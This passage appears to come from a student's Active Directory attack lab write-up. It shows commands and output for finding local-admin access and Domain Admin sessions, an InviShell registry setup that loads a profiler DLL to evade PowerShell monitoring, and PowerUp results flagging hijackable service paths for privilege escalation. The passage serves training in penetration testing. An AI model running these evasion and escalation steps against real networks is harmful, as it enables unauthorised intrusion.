RegisteredUser : Windows User
SerialNumber : 00454-80000-00000-AA677
Version : 10.0.20348

The current user has Local Admin access on: DCORP-ADMINSRV

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA239
Version : 10.0.20348

The current user has Local Admin access on: DCORP-STD163

Find-PSRemotingLocalAdminAccess.ps1 – Works in the same way as Find-WMILocalAdminAccess.ps1.

PS C:\Users\student163> . C:\Ad\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Users\student163> Find-PSRemotingLocalAdminAccess -ComputerFile
"C:\Users\student163\Desktop\shared\Computers.txt"
dcorp-adminsrv

Find a computer where the domain admin has sessions

Find-DomainUserLocation – By default this function queries the Domain Controller for the list of Domain
Admins (Get-DomainGroupMember), gets the list of Computers (Get-DomainComputer) and lists sessions
and logged on users (Get-NetSession or Get-NetLoggedon) from each machine. We can also use this
function to get the sessions of any other group. For this we need to use the parameter UserGroupIdentity.

From Server 2019 onwards, this function requires local administrative privileges to list the sessions.
PS C:\Users\student163> Find-DomainUserLocation -Verbose
VERBOSE: [Find-DomainUserLocation] Querying for all computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string:
(&(objectCategory=group)(|(samAccountName=Domain
Admins)))
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from 'CN=svc
admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (|(distinguishedname=CN=svc
admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(distinguishedname=CN=svc
admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetUsers length: 2
VERBOSE: [Find-DomainUserLocation] Using threading with threads: 20
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed
PS C:\Users\student163> Find-DomainUserLocation -UserGroupIdentity "RDPUsers" -Verbose
VERBOSE: [Find-DomainUserLocation] Querying for all computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string:
(&(objectCategory=group)(|(samAccountName=RDPUsers)))
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student180,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student180,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student180,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student179,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student179,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student179,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student178,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student178,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student178,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student177,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student177,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student177,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student176,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student176,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student176,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student175,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student175,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student175,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student174,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student174,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student174,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student173,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student173,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student173,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student172,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student172,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student172,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student171,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student171,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student171,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student170,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student170,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student170,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student169,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student169,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student169,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student168,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student168,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student168,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student167,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student167,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student167,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student166,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student166,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student166,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student165,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student165,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student165,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student164,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student164,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student164,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student162,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student162,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student162,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=student161,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=student161,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=student161,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Extracted domain 'dollarcorp.moneycorp.local' from
'CN=studentadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=studentadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=studentadmin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainUserLocation] TargetUsers length: 21
VERBOSE: [Find-DomainUserLocation] Using threading with threads: 20
VERBOSE: [Find-DomainUserLocation] TargetComputers length: 28
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Find Computers where a domain admin has session and the current user has admin privileges on it
PS C:\Users\student163> Find-DomainUserLocation -CheckAccess

With the Stealth option, the function checks only the File Servers and Distributed File Servers.
Local Privilege Escalation
It is not always necessary to have admin privileges on our foothold. However, having them definitely helps.
There are various ways in which we can escalate our privileges on a Windows box.

• Missing Patches
• Automated Deployment and Autologon passwords in clear text
• Always Install Elevated (Any user can run MSI as a system)
• Misconfigured Services
• DLL Hijacking
• NTLM Relaying

We can use the following tools to enumerate the privilege escalation path

• Powerup - https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
• Privesc - https://github.com/enjoiz/Privesc/blob/master/privesc.ps1
• winpeas - https://github.com/peass-ng/PEASS-
ng/blob/master/winPEAS/winPEASps1/winPEAS.ps1

In our Lab, we will use Powerup to check the possible paths for privilege escalation. In real assessments
it is recommended to use winpeas.
C:\Users\student163>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Users\student163>set COR_ENABLE_PROFILING=1

C:\Users\student163>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}"

/f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /f
The operation completed successfully.

C:\Users\student163>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-

b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.

C:\Users\student163>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\student163> . C:\Ad\Tools\PowerUp.ps1
PS C:\Users\student163> Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart : True

[*] Checking service executable and argument permissions...

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True

ServiceName : AbyssWebServer
Path : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile : C:\WebServer\Abyss Web Server
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart : True

ServiceName : edgeupdate
Path : "C:\Program Files
(x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False

ServiceName : edgeupdate
Path : "C:\Program Files
(x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
